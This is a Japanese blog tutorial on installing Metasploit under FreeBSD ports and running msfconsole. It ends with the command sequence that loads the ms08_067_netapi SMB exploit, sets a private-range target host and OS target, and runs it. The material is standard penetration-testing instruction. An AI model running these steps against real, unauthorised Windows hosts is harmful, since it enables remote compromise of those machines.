スポンサーリンク

このドキュメントの内容は、以下の通りです。

Metasploit プロジェクトは、
  • ペネトレーションテスト
  • IDS シグネチャの開発
  • exploit の研究 をする人々に有益な情報を提供することをゴールとしています。
2003年ごろは、 Perl スクリプト言語をベースに開発されていました。
2003年以降は、Ruby が使われるようになりました。

FreeBSD に metasploit をインストール


インストール


cd /usr/ports/security/metasploit/
sudo make install clean

portinstallコマンドでインストールする場合
sudo portinstall /usr/ports/security/metasploit/

portmasterコマンドでインストールする場合
sudo portmaster -y -d /usr/ports/security/metasploit/

参考サイト


メモ


nmap も依存関係のようです。

===>>> The following actions will be taken if you choose to proceed:
        Install security/metasploit
	Upgrade nasm-2.09.10,1 to nasm-2.10.03,1
	Install devel/ncurses
	Upgrade nmap-5.61.t5 to nmap-6.01
	Upgrade pcre-8.31 to
	pcre-8.31_1

インストール先



FreeBSD の場合、下記ディレクトリにインストールされています。
/usr/local/share/metasploit

動かし方


msfd を起動する


まずは、 msfd を起動します。

cd /usr/local/share/metasploit
sudo msfd
パスワード:
[*] Initializing msfd...
[*] Running msfd...

msfconsole を動かす


薫% ./msfconsole             23:24[vm2 /usr/local/share/metasploit]


MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM



       =[ metasploit v4.1.0-release [core:4.1 api:1.0]
+ -- --=[ 748 exploits - 383 auxiliary - 92 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r13992 updated 355 days ago (2011.10.18)

Warning: This copy of the Metasploit Framework was last updated 355 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

msf >

ファイルの更新方法


随分と、古いということなので、 svn で更新することにしました。

cd /usr/local/share/metasploit
sudo svn upgrade


msfconsole を動かす


もう一度、msfconsole を起動します。


薫% msfconsole                0:07[vm2 /usr/local/share/metasploit]

 ______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V4                        |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /            x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################



       =[ metasploit v4.1.0-release [core:4.1 api:1.0]
+ -- --=[ 748 exploits - 383 auxiliary - 92 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops

msf >

良い感じで起動しました。




つかえるexploitを表示します。
show exploits

exploit を選択します。
use windows/smb/ms08_067_netapi

実際の画面では、こんな感じ。
msf > use windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) >

exploit のオプションを確認します。
show options

対象ホストを設定します。
set RHOST 192.168.0.100

攻撃対象のOSの種類を選択するために、まず候補を確認します。
show targets

show targets でわかった、対象のOSのバージョンを指定します。
set target 51

実際に exploit を実行します。
exploit






スポンサーリンク
スポンサーリンク
 
いつもシェア、ありがとうございます!


もっと情報を探しませんか?

関連記事

最近の記事

人気のページ

スポンサーリンク
 

過去ログ

2020 : 01 02 03 04 05 06 07 08 09 10 11 12
2019 : 01 02 03 04 05 06 07 08 09 10 11 12
2018 : 01 02 03 04 05 06 07 08 09 10 11 12
2017 : 01 02 03 04 05 06 07 08 09 10 11 12
2016 : 01 02 03 04 05 06 07 08 09 10 11 12
2015 : 01 02 03 04 05 06 07 08 09 10 11 12
2014 : 01 02 03 04 05 06 07 08 09 10 11 12
2013 : 01 02 03 04 05 06 07 08 09 10 11 12
2012 : 01 02 03 04 05 06 07 08 09 10 11 12
2011 : 01 02 03 04 05 06 07 08 09 10 11 12
2010 : 01 02 03 04 05 06 07 08 09 10 11 12
2009 : 01 02 03 04 05 06 07 08 09 10 11 12
2008 : 01 02 03 04 05 06 07 08 09 10 11 12
2007 : 01 02 03 04 05 06 07 08 09 10 11 12
2006 : 01 02 03 04 05 06 07 08 09 10 11 12
2005 : 01 02 03 04 05 06 07 08 09 10 11 12
2004 : 01 02 03 04 05 06 07 08 09 10 11 12
2003 : 01 02 03 04 05 06 07 08 09 10 11 12

サイト

Vim入門

C言語入門

C++入門

JavaScript/Node.js入門

Python入門

FreeBSD入門

Ubuntu入門

セキュリティ入門

パソコン自作入門

ブログ

トップ


プライバシーポリシー